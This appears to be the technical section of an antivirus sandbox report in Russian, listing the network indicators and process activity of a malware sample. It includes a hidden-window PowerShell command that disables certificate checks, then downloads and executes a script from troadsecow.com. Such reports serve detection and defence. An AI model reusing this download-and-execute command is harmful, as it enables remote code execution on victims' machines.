Техническая информация
- https://troadsecow.com/fjasmngptwq95824s.php
- https://troadsecow.com/fjasmngptwq95824s.php
- nul
- DNS ASK tr###secow.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a=whoami;,[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex (New-Object Net.WebClient).DownloadString('https://troadsecow.com/fjasmngptwq95824s.php')' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 3
- '<SYSTEM32>\whoami.exe'
- '<SYSTEM32>\timeout.exe' 2
- '<SYSTEM32>\timeout.exe' 4
- '<SYSTEM32>\timeout.exe' 1